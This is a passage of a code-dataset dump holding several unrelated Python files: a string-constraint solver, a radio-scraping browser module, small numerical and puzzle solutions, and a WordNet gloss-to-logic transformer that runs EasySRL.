nodeNo, reachFinal;\\n')\n\n # program begins\n fp.write(prog_start)\n fp.write(f' nodeNo = {node_count};\\n') # set nodeNo to zero (initial node)\n fp.write(' reachFinal = 0;\\n')\n fp.write(f' while (1) {while_start}\\n')\n # start traverse from init node to final node\n init = tree.get_solution_node()\n final = tree.root\n [queued_node.add(s) for s in init]\n while len(queued_node) > 0:\n tmp_node = queued_node.pop()\n # cases of node\n if tmp_node in visited_node: # already processed: skip to next loop\n continue\n else:\n visited_node.add(tmp_node)\n\n if tmp_node in init: # this is the initial node\n fp.write(f' if (nodeNo=={node_count}) {if_start}\\n')\n # node_count = 0 (the first loop)\n fp.write(f' /* node = {print_word_equation_list_pretty(tmp_node.word_equations)} */\\n')\n else:\n fp.write(f' if (nodeNo=={node2_count[tmp_node]}) {if_start}\\n')\n # node2_count must has key \"tmp_node\"\n fp.write(f' /* node = {print_word_equation_list_pretty(tmp_node.word_equations)} */\\n')\n if tmp_node == final: # this is the final node\n if tmp_node in trans: # final node has transition\n fp.write(f' {random_final}')\n fp.write(f' if (reachFinal >= 0) {if_start} /* final node */\\n')\n fp.write(' break;\\n')\n fp.write(f' {if_end}\\n')\n else:\n fp.write(' break;\\n')\n fp.write(f' {if_end}\\n')\n continue\n\n tmp_labl = trans[tmp_node]\n tmp_len = len(tmp_labl)\n\n if tmp_len > 1: # two or more parent nodes # currently not completed\n fp.write(random_decl)\n # print \" assume rdn>=1 and rdn <=\" + str(tmp_len) + ';'\n rdn_count = 1 # start from 1\n for s in tmp_labl:\n if rdn_count == 1:\n fp.write(f' if (rdn<={rdn_count}) {if_start}\\n')\n elif rdn_count == tmp_len:\n fp.write(f' if (rdn>={rdn_count}) {if_start}\\n')\n else:\n fp.write(f' if (rdn=={rdn_count}) {if_start}\\n')\n fp.write(f' {print_transform_rewrite_length(s)};\\n')\n fp.write(f' // {print_transform_rewrite_pretty(s)};\\n')\n # information for retrieving solution\n if s.source in node2_count:\n fp.write(f' nodeNo={node2_count[s.source]};\\n')\n else:\n node_count += 1\n fp.write(f' nodeNo={node_count};\\n')\n node2_count[s.source] = node_count\n queued_node.add(s.source)\n fp.write(f' {if_end}\\n')\n rdn_count += 1\n else:\n for s in tmp_labl:\n fp.write(f' {print_transform_rewrite_length(s)};\\n')\n fp.write(f' // {print_transform_rewrite_pretty(s)};\\n')\n # information for retrieving solution\n if s.source in node2_count:\n fp.write(f' nodeNo={node2_count[s.source]};\\n')\n else:\n node_count += 1\n fp.write(f' nodeNo={node_count};\\n')\n node2_count[s.source] = node_count\n queued_node.add(s.source)\n\n fp.write(f' {if_end}\\n')\n fp.write(f' {while_end}\\n')\n length_cons = print_length_constraints_as_strings(problem.len_constraints)\n if length_cons:\n if len(length_cons) == 1:\n lc = length_cons[0]\n else: # multiple length constraints, take conjunction\n lc = ' && '.join(length_cons)\n if code_type == \"UAutomizerC\" and length_cons:\n # length constraint (for UAutomizer)\n fp.write(f' if ({lc}) {{ //length constraint: {length_cons}\\n')\n fp.write(' ERROR: __VERIFIER_error();\\n')\n fp.write(' }\\n')\n fp.write(' else {\\n')\n fp.write(' return 0;\\n')\n fp.write(' }\\n')\n if code_type == \"EldaricaC\" and length_cons: # length constraint (for Eldarica)\n fp.write(f' assert (!({lc})); //length constraint: {length_cons}\\n')\n fp.write(prog_end)\n\n fp.close()\n return filename\n","repo_name":"hsuhw/qses","sub_path":"src/main/python/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":58943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"11552502771","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*-\n# auther; 18793\n# Date:2019/9/8 20:46\n# filename: 01.一个简单的异常.py\n\ndef exp_exception(x, y):\n try:\n a = x / y\n print(\"a=\", a)\n except Exception:\n print(\"程序出现异常,异常信息:被除数为0\")\n\n\nexp_exception(2, 0) # 程序出现异常,异常信息:被除数为0\n\nexp_exception(1, 2) # a= 0.5\n","repo_name":"hujianli94/Python-code","sub_path":"9.异常程序调试/01.一个简单的异常.py","file_name":"01.一个简单的异常.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"40141368238","text":"import numpy as np\nimport pathlib\nimport json\n\n\ndef one_hot_encoding_data(data):\n new_data = []\n for index_i in range(len(data)):\n new_data.append([])\n for index_k in range(len(data[index_i])):\n value = data[index_i][index_k]\n if float(value) < 0:\n encoded_string = \"b001\"\n elif float(value) == 0:\n encoded_string = \"b010\"\n else:\n encoded_string = \"b100\"\n\n new_data[index_i].append(encoded_string)\n return new_data\n\n\ncurrentDirectory = str(pathlib.Path().absolute())\n\nX = np.load(currentDirectory + '/ConcatData/xScaledConcat.npy')\ny = np.load(currentDirectory + '/ConcatData/yConcat.npy')\n\nx_encoded = one_hot_encoding_data(X)\nwith open('xScaledConcatEncoded.txt', 'w') as file_handle:\n json.dump(x_encoded, file_handle)\n\n\n\n\n","repo_name":"furkanreha/HE-Training-Encoded","sub_path":"encodeTheData.py","file_name":"encodeTheData.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"9429853511","text":"from weboob.browser import PagesBrowser, URL\nfrom .pages import RadioPage, JsonPage, PodcastPage\n\n__all__ = ['RadioFranceBrowser']\n\n\nclass RadioFranceBrowser(PagesBrowser):\n json_page = URL('sites/default/files/(?P.*).json',\n 'player-json/reecoute/(?P.*)',\n 'station/(?P.*)',\n 'programmes\\?xmlHttpRequest=1',\n 'autocomplete/emissions.json',\n JsonPage)\n podcast_page = URL('podcast09/rss_(?P.*)\\.xml', PodcastPage)\n radio_page = URL('(?P.*)', RadioPage)\n\n def get_radio_url(self, radio, player):\n self.fill_base_url(radio)\n\n if radio == 'francebleu':\n return self.json_page.go(fbplayer=player).get_fburl()\n\n return self.radio_page.go(page=player).get_url()\n\n def fill_base_url(self, radio):\n if radio in ['franceinter', 'francebleu', 'franceculture', 'francemusique']:\n self.BASEURL = 'https://www.%s.fr/' % radio\n else:\n self.BASEURL = 'http://www.%s.fr/' % radio\n\n def get_current(self, radio, url):\n self.fill_base_url(radio)\n\n if radio == 'francebleu':\n return self.radio_page.go(page=url).get_current()\n\n if radio in ['franceculture', 'franceinter', 'francemusique']:\n return self.json_page.go().get_culture_inter_current()\n\n if radio == 'francetvinfo':\n return u'', u''\n\n return self.json_page.go(json_url=url).get_current()\n\n def get_selection(self, radio_url, json_url, radio_id):\n self.BASEURL = 'http://www.%s.fr/' % radio_url\n if radio_id == 'fipradio':\n return self.json_page.go(json_url_fip=json_url).get_selection(radio_id=radio_id)\n elif radio_id == 'franceculture':\n self.fill_base_url(radio_id)\n return self.radio_page.go(page='').get_france_culture_selection(radio_id=radio_id)\n elif radio_id == 'francetvinfo':\n self.fill_base_url(radio_id)\n selection_list = self.radio_page.go(page=json_url).get_francetvinfo_selection_list()\n sel = []\n for item in selection_list:\n sel.append(self.radio_page.go(page=item).get_francetvinfo_selection())\n return sel\n\n return self.json_page.go(json_url=json_url).get_selection(radio_id=radio_id)\n\n def get_audio(self, _id, radio_url, json_url, radio_id):\n for item in self.get_selection(radio_url, json_url, radio_id):\n if item.id == _id:\n return item\n return []\n\n def get_podcast_emissions(self, radio_url, podcast_url, split_path):\n self.fill_base_url(radio_url)\n if split_path[0] == 'franceinter':\n return self.radio_page.go(page=podcast_url).get_france_inter_podcast_emissions(split_path=split_path)\n elif split_path[0] == 'franceculture':\n self.location('%s%s' % (self.BASEURL, podcast_url))\n return self.page.get_france_culture_podcast_emissions(split_path=split_path)\n elif split_path[0] == 'francetvinfo':\n return self.radio_page.go(page=podcast_url).get_france_info_podcast_emissions(split_path=split_path)\n elif split_path[0] == 'francemusique':\n return self.radio_page.go(page=podcast_url).get_france_musique_podcast_emissions(split_path=split_path)\n elif split_path[0] == 'mouv':\n return self.radio_page.go(page=podcast_url).get_mouv_podcast_emissions(split_path=split_path)\n\n def get_podcasts(self, podcast_id):\n self.BASEURL = 'http://radiofrance-podcast.net/'\n return self.podcast_page.go(podcast_id=podcast_id).iter_podcasts()\n\n def get_france_culture_podcasts_url(self, url):\n self.BASEURL = 'https://www.franceculture.fr/'\n return self.radio_page.go(page='emissions/%s' % url).get_france_culture_podcasts_url()\n\n def get_francetvinfo_podcasts_url(self, url):\n self.BASEURL = 'http://www.francetvinfo.fr/'\n return self.radio_page.go(page='replay-radio/%s' % url).get_francetvinfo_podcasts_url()\n","repo_name":"laurentb/weboob","sub_path":"modules/radiofrance/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"75"} +{"seq_id":"23954992630","text":"import numpy as np\nimport sympy as sp\n\nfrom matplotlib import pyplot as plt\nfrom sympy import init_printing\nfrom sympy.utilities.lambdify import lambdify\nfrom matplotlib.animation import FuncAnimation\n\nimport ival\nimport para\n\nnx = para.nx\nnt = para.nt\ndx = para.dx\ndt = para.dt\n\nfn_phi = ival.fn_phi\nfn_v = ival.fn_v\n#################################################\n#################################################\n#################################################\n\n\nx=np.linspace(-1/2,1/2,nx)\n\nphi=np.asarray([fn_phi(xi) for xi in x], dtype=complex)\nnorm = np.sum(np.abs(phi**2))\nphi = phi/norm\nv=np.asarray([fn_v(xi) for xi in x], dtype=complex) * 500\n\n#################################################\n#################################################\n#################################################\n\ndef phi():\n \n result=np.zeros([nt,nx], dtype=complex)\n result[0]=[fn_phi(xi) for xi in x]\n \n for i in range(len(result)-1):\n result[i+1][1:-1] = result[i][1:-1] +\\\n 1j*dt*v[1:-1]*result[i][1:-1] +\\\n 1j/2 * dt/dx**2 * (result[i][2:] - 2*result[i][1:-1] + result[i][:-2]) \n result[i+1][0]=result[i+1][-1]=0\n\n norm = np.sum(np.abs(result[i+1])) * dx*2\n result[i+1]=result[i+1]/norm\n\n return result\n\n\n","repo_name":"ramakantgadhewal/NMQM","sub_path":"python/tmp/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"46868805452","text":"# Question Link - https://leetcode.com/problems/permutation-sequence/\n\n# Solution - \n\nclass Solution:\n def getPermutation(self, n: int, k: int) -> str:\n fact = [1, 1, 2, 6, 24, 120, 720, 5040, 40320, 362880, 3628800]\n arr = [\"0\"]\n \n for i in range(1, n+1):\n arr.append(str(i))\n\n ans = \"\"\n \n while k != 0:\n t = k//(fact[n-1])\n r = k%(fact[n-1])\n\n if r == 0:\n ans += arr[t]\n arr.remove(arr[t])\n ans += (''.join(arr[1:][::-1]))\n else:\n ans += arr[t+1]\n arr.remove(arr[t+1])\n \n k = r\n n -= 1\n \n return ans\n","repo_name":"codethat-vivek/Code","sub_path":"LeetCode/Permutation Sequence.py","file_name":"Permutation Sequence.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22686122321","text":"import numpy as np\nfrom itertools import product\n\nwith open(\"input.txt\", \"rb\") as f:\n d = f.read().strip()\nd = np.frombuffer(d, dtype=np.uint8) - 48\nd = d.reshape((d.size//(25*6), 6, 25))\n\ncounts = []\nfor layer in d:\n layer = layer.ravel()\n counts.append((sum(layer == 0), sum(layer == 1), sum(layer == 2)))\n\n# Part 1\nmc = min(counts)\nprint(mc, mc[1]*mc[2])\n\n# Part 2\nimage = np.full((6, 25), 2, dtype=np.uint8)\nfor layer in d:\n for x, y in product(range(25), range(6)):\n if image[y, x] == 2:\n image[y, x] = layer[y, x]\nfor y in range(6):\n for x in range(25):\n print(\" \" if image[y, x] == 0 else \"█\", end='')\n print()\n","repo_name":"spauka/AOC2019","sub_path":"d8/d8.py","file_name":"d8.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1807504401","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# AUTHOR: Tonio Weidler\n\n\"\"\"Module provides a class for transforming glosses into logical transformations.\"\"\"\n\nimport sys\nimport os\nsys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../../\"))\n\nimport subprocess as sp\nfrom src.glosses.Glosses import CollocationMember, CollocationHead\nimport re\nimport json\nimport datetime\nfrom src.util import find_predicates\n\nclass GlossTransformer(object):\n\t\"\"\"Gloss Transformation Class that allows to transform a collection of disambiguated glosses into\n\tlogically transformed glosses.\n\n\tAttributes:\n\t\tglosses\t\t(dict)\t\tdictionary containing the synset ids and their untransformed glosses\n\n\tMethods:\n\t\ttransform_glosses\t\t\t(dict/bool)\t\ttransform the glosses from scratch into an corpus containing\n\t\t\t\t\t\t\t\t\t\t\t\t\tthe used gloss order and one line per transformed gloss(-part)\n\t\t\t\t\t\t\t\t\t\t\t\t\toptionally write this corpus to a file to avoid repeting the process\n\t\tread_transformed_glosses\t(dict)\t\t\tread the transformed glosses corpus from a file and create LogicallyTransformedGlosses\n\t\"\"\"\n\n\tdef __init__(self, glosses):\n\t\tself.__dict__.update(locals())\n\t\tdel self.__dict__[\"self\"]\n\n\t\tlog_dir = \"log/\"\n\t\ttime = datetime.datetime.now()\n\t\ttimestamp = \"{0}_{1}_{2}_{3}:{4}\".format(time.day, time.month, time.year, time.hour, time.minute)\n\t\tself._logfile = log_dir + \"gloss_transformation_\" + timestamp + \".log\"\n\t\twith open(self._logfile, \"w\") as f:\n\t\t\tf.write(\"LOG FILE - GLOSS TRANSFORMATION\\n\\n\")\n\n\t\tself._gloss_order = list(self.glosses.keys())\n\t\tself._transformation_type = \"logic\"\n\n\t\tself._mappable_predicates = 0\n\t\tself._mapped_predicates = 0\n\n\tdef transform_glosses(self, target_file=None):\n\t\t\"\"\"Transform the glosses from scratch into an corpus containing\n\t\tthe used gloss order and one line per transformed gloss(-part)\n\t\toptionally write this corpus to a file to avoid repeting the process.\n\n\t\tArguments:\n\t\t\ttarget_file\t\t(string)\toptionally provide a path that the corpus will\n\t\t\t\t\t\t\t\t\t\tbe written to\n\t\tReturns:\n\t\t\t(bool/string)\tif no path provided return the gloss corpus as strings,\n\t\t\t\t\t\t\telse if writing succeeds return True\n\t\t\"\"\"\n\t\tprint(\"=== Transforming Glosses ===\")\n\t\tprint(\"building corpus...\")\n\t\tgloss_corpus = self._build_gloss_corpus(self.glosses)\n\t\tprint(\"transforming...\")\n\t\tparsed_gloss_corpus = self._apply_transformation_tool(gloss_corpus)\n\t\tgloss_order_reference = \"%ORDER {0}\\n\".format(self._gloss_order)\n\n\t\tif target_file:\n\t\t\twith open(target_file, \"w\") as f:\n\t\t\t\tf.write(str(gloss_order_reference + parsed_gloss_corpus))\n\t\t\treturn True\n\n\t\telse:\n\t\t\treturn parsed_gloss_corpus\n\n\tdef read_transformed_glosses(self, filename):\n\t\t\"\"\"Read the transformed glosses corpus from a file and create LogicallyTransformedGlosses.\"\"\"\n\t\tprint(\"=== Transforming Glosses ===\")\n\t\twith open(filename, \"r\") as f:\n\t\t\tcontent = f.read()\n\n\t\torder = re.search(\"%ORDER (.*?)\\n\", content).group(1)\n\t\tself._gloss_order = json.loads(re.sub(\"'\", '\"', order))\n\n\t\ttransformed_glosses = re.sub(\"(^%.*?\\n|\\n\\Z)\", \"\", content)\n\t\ttransformed_glosses_list = [g if g != \"\" else \"EMPTY\" for g in transformed_glosses.split(\"\\n\")]\n\n\t\treturn self._extend_glosses_with_transformations(transformed_glosses_list)\n\n\tdef _extend_glosses_with_transformations(self, transformed_gloss_strings):\n\t\t\"\"\"Extend the glosses with the transformations to LogicallyTransformed Glosses.\"\"\"\n\t\tprint(\"...parsing transformations\")\n\t\ttransformed_glosses = {}\n\n\t\tself._mappable_predicates = 0\n\t\tself._mapped_predicates = 0\n\n\t\tfor i, gloss_key in enumerate(self._gloss_order):\n\t\t\tgloss = self.glosses[gloss_key]\n\t\t\tgloss_transformation_string = transformed_gloss_strings[i]\n\n\t\t\tif gloss_transformation_string != \"EMPTY\":\n\t\t\t\tparsed_transformation = GlossTransformer.parse_logic_transformation(gloss_transformation_string)\n\n\t\t\t\tif gloss_key not in transformed_glosses:\n\t\t\t\t\ttransformed_glosses[gloss_key] = gloss.gloss_to_transformed_gloss([gloss_transformation_string], [self._extract_entities_from_transformation(gloss_key, gloss_transformation_string, parsed_transformation)], [parsed_transformation])\n\t\t\t\telse:\n\t\t\t\t\ttransformed_glosses[gloss_key].transformed_gloss_strings.append(gloss_transformation_string)\n\t\t\t\t\ttransformed_glosses[gloss_key].transformed_gloss_entities.append(self._extract_entities_from_transformation(gloss_key, gloss_transformation_string, parsed_transformation))\n\t\t\t\t\ttransformed_glosses[gloss_key].transformed_gloss_parsed.append(parsed_transformation)\n\n\t\tprint(\"...of {0} predicates in the transformation {1} ({2}) could be mapped to a key.\".format(self._mappable_predicates, self._mapped_predicates, round(self._mapped_predicates/float(self._mappable_predicates)*100, 2)))\n\n\t\treturn transformed_glosses\n\n\t@staticmethod\n\tdef parse_logic_transformation(transformation):\n\t\t\"\"\"Parse a logic transformation into a python-readable representation of lists and tuples.\"\"\"\n\t\tpredicate_argument_pattern = re.compile(r\"([^()\\[\\],&|{}]+)|\\s*([|,()\\[\\]{}&])\\s*\")\n\t\tif transformation.count(\"(\") != transformation.count(\")\"):\n\t\t\traise SyntaxError(\"Unmatching amount of brackets\\n{0}!\".format(transformation))\n\n\t\targs = []\n\t\tcurrent_element = None # may be a single element or a function with its arguments\n\t\tstate = 0 # 0 -> before element, 1 -> after element, 2 -> after closing bracket, 3 -> after round opening bracket; 3 implies 0\n\t\tstack = [] # remembers the last arg/current_element before the current level was entered\n\t\texistential_skopus = False # tracks whether an existential skopus has been opened in the last step\n\n\t\tfor match in predicate_argument_pattern.finditer(transformation):\n\t\t\t# handle predicates\n\t\t\tif match.group(1):\n\t\t\t\tif state == 1: raise RuntimeError(\"Regex failed; Expected argument structure for last element at {0}\\n{1}!\".format(match.start(), transformation))\n\t\t\t\tif state == 2: print((\"Missing control symbol for argument listing at {0}\\n{1}!\".format(match.start(), transformation)))\n\n\t\t\t\tcurrent_element = match.group(1)\n\t\t\t\tstate = 1\n\n\t\t\t# handle control symbols\n\t\t\telif match.group(2) in \"([{\":\n\n\t\t\t\tif match.group(2) == \"{\":\n\t\t\t\t\tcurrent_element = \"OR\"\n\t\t\t\t\tstate = 0\n\t\t\t\telif match.group(2) == \"[\":\n\t\t\t\t\texistential_skopus = True\n\t\t\t\t\tstate = 0\n\t\t\t\telif match.group(2) == \"(\":\n\t\t\t\t\tif state == 3: current_element = \"OR\"\n\t\t\t\t\tif existential_skopus:\n\t\t\t\t\t\tcurrent_element = \"EXISTENTIAL_SKOPUS\"\n\t\t\t\t\t\texistential_skopus = False\n\n\t\t\t\t\tstate = 3\n\n\t\t\t\tstack.append((args, current_element)) # a new argument structure begins so remember the old level\n\t\t\t\tcurrent_element = None\n\t\t\t\targs = []\n\n\t\t\telif match.group(2) in \")]}\":\n\t\t\t\t# if there is nothing in the stack, then there was no opening bracket for this closing bracket\n\t\t\t\tif not stack: print((\"unmatched closing bracket at {0}\\n{1}\".format(match.start(), transformation)))\n\t\t\t\t# if the last element was either an single element or a predicate+argument than add this to the args of the current level\n\t\t\t\tif state != 0 and state != 3: args.append(current_element)\n\n\t\t\t\t# then close the level by using the higher level current element (which should be a predicate) and the current args as new current element\n\t\t\t\t# and setting the current args equal to the higher level args\n\t\t\t\t# this means: go one level higher and add this level to the higher level as an argument\n\t\t\t\tpredicate_args = args\n\t\t\t\targs, current_element = stack.pop()\n\t\t\t\tcurrent_element = (current_element, predicate_args)\n\n\t\t\t\tstate = 2\n\n\t\t\telif match.group(2) in \",&\":\n\t\t\t\tif state != 0 and state != 3: args.append(current_element)\n\t\t\t\tcurrent_element = None\n\t\t\t\tstate = 0\n\n\t\t\telif match.group(2) == \"|\":\n\t\t\t\tif state == 0 and state == 3:\n\t\t\t\t\traise SyntaxError(\"Found | after opening bracket at {0}\\n{1}!\".format(match.start(), transformation))\n\t\t\t\targs.append(current_element)\n\t\t\t\tcurrent_element = \"WRAPPER\"\n\t\t\t\tstate = 0\n\n\t\tif state != 0: args.append(current_element)\n\n\t\treturn args\n\n\n\tdef _extract_entities_from_transformation(self, gloss_key, transformed_gloss, parsed_logic_transformation):\n\t\t\"\"\"Extract entities from the transformation and preextract some information about them.\"\"\"\n\t\toutput = {}\n\t\tgloss = self.glosses[gloss_key]\n\n\t\t# collect all entities and events\n\t\tvariables = re.findall(r\"([#∃]+)([a-z\\']+)\\.?\", transformed_gloss)\n\n\t\t# DEPRECATED\n\t\t# predicate_pattern = regex.compile(r\"(\\w+)(?=\\(((?:[^()]*\\((?2)\\)|[^()])*)\\))\")\n\t\t# predicates_with_contents = predicate_pattern.findall(transformed_gloss)\n\n\t\t# find relevant information per variable\n\t\tfor v_tuple in variables:\n\t\t\tv_quantifier, v = v_tuple\n\t\t\t# determine the variables type\n\t\t\tif re.match(\"[xyzuv]'*\", v):\n\t\t\t\tvariable_type = \"entity\"\n\t\t\telif re.match(\"e'*\", v):\n\t\t\t\tvariable_type = \"event\"\n\t\t\telif re.match(\"[pqr]'*\", v):\n\t\t\t\tvariable_type = \"other\"\n\t\t\telse:\n\t\t\t\tself._log_error(\"WARNING: unhandled variable symbol {0}\".format(v), gloss_key)\n\n\t\t\t# get all predicates that ONLY contain the variable and therefore modify it directly\n\t\t\tall_predicates = find_predicates(parsed_logic_transformation, r\"([#∃][a-z]\\'*\\.)?([a-z]+)\")\n\t\t\tvariable_predicates = set([re.search(r\"([#∃][a-z]\\'*\\.)?([a-z]+)\", predicates[0]).group(2) for predicates in all_predicates if len(predicates[1]) == 1 and v in predicates[1]])\n\n\t\t\t# map predicates with senses\n\t\t\tdisambiguated_variable_predicates = self._map_senses_to_predicates(variable_predicates, gloss)\n\n\t\t\t# initialize the transformation parse dict with general information that all variable types need\n\t\t\toutput[v] = {\n\t\t\t\t\"type\": variable_type,\n\t\t\t\t\"predicates\": disambiguated_variable_predicates,\n\t\t\t\t\"quantifier\": {\"#\": \"lambda\", \"∃\": \"existential\"}[v_quantifier],\n\t\t\t}\n\n\t\t\t# add special event information\n\t\t\tif variable_type == \"entity\":\n\t\t\t\tentity_arguments = [arg for arg in find_predicates(parsed_logic_transformation, \"ARG\") if arg[1][-1] == v]\n\n\t\t\t\toutput[v].update({\n\t\t\t\t\t\t\"arguments\": {}\n\t\t\t\t})\n\n\t\t\t\tfor arg in entity_arguments:\n\t\t\t\t\t# any argument needs to be a list in case a coordination implies multiple arguments at the same position\n\t\t\t\t\targument = arg[1][:-1]\n\n\t\t\t\t\t# add the arguments to the output\n\t\t\t\t\tif arg[0] not in output[v][\"arguments\"]:\n\t\t\t\t\t\toutput[v][\"arguments\"].update({arg[0]: [argument]})\n\t\t\t\t\telse:\n\t\t\t\t\t\toutput[v][\"arguments\"][arg[0]].append(argument)\n\n\t\t\tif variable_type == \"event\":\n\t\t\t\tevent_arguments = [arg for arg in find_predicates(parsed_logic_transformation, \"ARG[A-Z0-9]?\") if arg[1][-1] == v]\n\n\t\t\t\toutput[v].update({\n\t\t\t\t\t\t\"arguments\": {}\n\t\t\t\t})\n\n\t\t\t\tfor arg in event_arguments:\n\t\t\t\t\t# any argument needs to be a list in case a coordination implies multiple arguments at the same position\n\t\t\t\t\targument = arg[1][:-1]\n\n\t\t\t\t\t# add the arguments to the output\n\t\t\t\t\tif arg[0] not in output[v][\"arguments\"]:\n\t\t\t\t\t\toutput[v][\"arguments\"].update({arg[0]: [argument]})\n\t\t\t\t\telse:\n\t\t\t\t\t\toutput[v][\"arguments\"][arg[0]].append(argument)\n\n\n\t\treturn output\n\n\tdef _map_senses_to_predicates(self, variable_predicates, gloss):\n\t\t\"\"\"Map the sense keys from the Gloss Tokens to the according predicates in the transformation. ~90% successrate...\"\"\"\n\t\tdisambiguated_variable_predicates = []\n\t\tgloss_token_stack = gloss.tokens.copy()\n\n\t\tfor i, pred in enumerate(variable_predicates):\n\t\t\tself._mappable_predicates += 1\n\t\t\tpredicate_sense = \"UNKNOWN\"\n\t\t\tfor token_id in sorted(gloss_token_stack.keys()):\n\t\t\t\ttoken = gloss.tokens[token_id]\n\t\t\t\tif pred.lower() in token.lemma_strings or (type(token) == CollocationHead and pred.lower() in [coll.split(\"_\")[0] for coll in token.lemma_strings]):\n\t\t\t\t\tif type(token) == CollocationMember:\n\t\t\t\t\t\tfor i in gloss.tokens:\n\t\t\t\t\t\t\tt = gloss.tokens[i]\n\t\t\t\t\t\t\tif type(t) == CollocationHead:\n\t\t\t\t\t\t\t\t# there are some odd cases where the member has two heads, heuristacally the first head will be taken\n\t\t\t\t\t\t\t\tif token.collocation_id[0] in t.collocation_id:\n\t\t\t\t\t\t\t\t\tcoll_head = t\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcoll_head = None # actually if this happens an error occurs\n\n\t\t\t\t\t\tpredicate_sense = coll_head.collocation_wn_sense_key\n\t\t\t\t\telif type(token) == CollocationHead:\n\t\t\t\t\t\tpredicate_sense = token.collocation_wn_sense_key\n\t\t\t\t\telse:\n\t\t\t\t\t\tpredicate_sense = token.wn_sense_key\n\t\t\t\t\tgloss_token_stack.pop(token_id)\n\t\t\t\t\tself._mapped_predicates += 1\n\t\t\t\t\tbreak\n\n\t\t\tdisambiguated_variable_predicates.append((pred, predicate_sense))\n\n\t\treturn disambiguated_variable_predicates\n\n\tdef _apply_transformation_tool(self, gloss_corpus):\n\t\t\"\"\"Apply EasySRL via subprocess to transform the glosses.\"\"\"\n\t\twith open(\"gloss_corpus.tmp\", \"w\") as f:\n\t\t\tf.write(gloss_corpus)\n\n\t\ttry:\n\t\t\tparser_output = sp.check_output(\"java -Xmx2g -jar src/tools/easysrl/easysrl.jar --model src/tools/easysrl/model/ --maxLength 150 --outputFormat {0} --inputFile gloss_corpus.tmp 2>{1}\".format(self._transformation_type, self._logfile+\".parser_log\"), shell=True, universal_newlines=True)\n\t\texcept sp.CalledProcessError as e:\n\t\t\treturn e.output\n\n\t\tos.remove(\"gloss_corpus.tmp\")\n\n\t\treturn parser_output\n\n\tdef _build_gloss_corpus(self, glosses, ignore_parenthesis_content=True):\n\t\t\"\"\"Create a corpus of glosses in a file, meant to be read and transformed by EasySRL.\"\"\"\n\t\tgloss_corpus = \"\"\n\t\tcorpus_gloss_order = [] # gloss order for the corpus, including duplicate entries for glosses with multiple definitions\n\n\t\tfor gloss_key in self._gloss_order:\n\t\t\tgloss = self.glosses[gloss_key]\n\t\t\tgloss_definitions = gloss.gloss_definitions\n\t\t\tfor definition in gloss_definitions:\n\t\t\t\tgloss_text = re.sub(r\"[.,;:?!]\", \" \\g<0> \", definition)\n\t\t\t\tgloss_text = re.sub(r\"'(s)\", \"\\g<1>\", gloss_text)\n\t\t\t\tif ignore_parenthesis_content:\n\t\t\t\t\tgloss_text = re.sub(r\"\\(.*?\\)\", \"\", gloss_text)\n\t\t\t\t\tgloss_text = re.sub(r\"[()]\", \"\", gloss_text)\n\t\t\t\telse:\n\t\t\t\t\tgloss_text = re.sub(r\"\\(\", \" -LRB- \", gloss_text)\n\t\t\t\t\tgloss_text = re.sub(r\"\\)\", \" -RRB- \", gloss_text)\n\n\t\t\t\tgloss_text = re.sub(r\"(\\s)+\", \"\\\\1\", gloss_text)\n\n\t\t\t\tif gloss_text != \"\":\n\t\t\t\t\tgloss_corpus += gloss_text + \"\\n\"\n\t\t\t\telse:\n\t\t\t\t\tgloss_corpus += \"PLACEHOLDER\" + \"\\n\"\n\t\t\t\t\tself._log_error(\"WARNING: Empty Gloss\", gloss)\n\n\t\t\t\tcorpus_gloss_order.append(gloss_key)\n\n\t\t# save gloss corpus to file for debugging purposes\n\t\twith open(\"gloss_corpus.txt\", \"w\") as f:\n\t\t\tf.write(gloss_corpus)\n\n\t\tself._gloss_order = corpus_gloss_order\n\t\treturn gloss_corpus\n\n\tdef _log_error(self, message, gloss):\n\t\t\"\"\"Log potential Errors/Warnings to the logfile.\"\"\"\n\t\twith open(self._logfile, \"a\") as f:\n\t\t\tf.write(\"{0}\\n\\t\\t{1}\\n\".format(message, gloss))\n\nif __name__ == \"__main__\":\n\timport timeit\n\timport regex\n\tfrom pprint import pprint\n\n\twith open(\"extracted_data/transformations_100.txt\", \"r\") as f:\n\t\tcorpus = f.read().split(\"\\n\")[1:]\n\n\ttest_string = \"sk(#x.(phrase(x)&∃e[(use(e)&ARG1(x,e)&∃e'[∃y[(say(e')&ARG0(y,e')&∃e''[(examine(e'')&ARG1(sk(#z.publication(z)),e'')&contain(e'')&ARG0(sk(#z.publication(z)),e'')&∃e'''[(offensive(e''')&ARG(sk(#u.nothing(u)),e''')&to(sk(#v.church(v)),e''')&ARG1(e''',e''))]&ARG1(sk(#u.nothing(u)),e'')&ARG1(e'',e'))]&ARG(e',e))]]&ARG(sk(#x'.(censor(x')&ARG(sk(#y'.roman-catholic-church(y')),x')&official(x'))),e))]))\"\n\n\ttic_r = timeit.default_timer()\n\tpredicate_pattern = regex.compile(r\"(\\w+)(?=\\(((?:[^()]*\\((?2)\\)|[^()])*)\\))\")\n\tpredicates_with_contents = predicate_pattern.findall(test_string)\n\ttoc_r = timeit.default_timer()\n\n\ttic_p = timeit.default_timer()\n\tp = GlossTransformer.parse_logic_transformation(test_string)\n\tpreds = find_predicates(p, \"[a-z]+\")\n\tpprint(p)\n\ttoc_p = timeit.default_timer()\n\n\tprint(\"Regex: {0}s\\nParser: 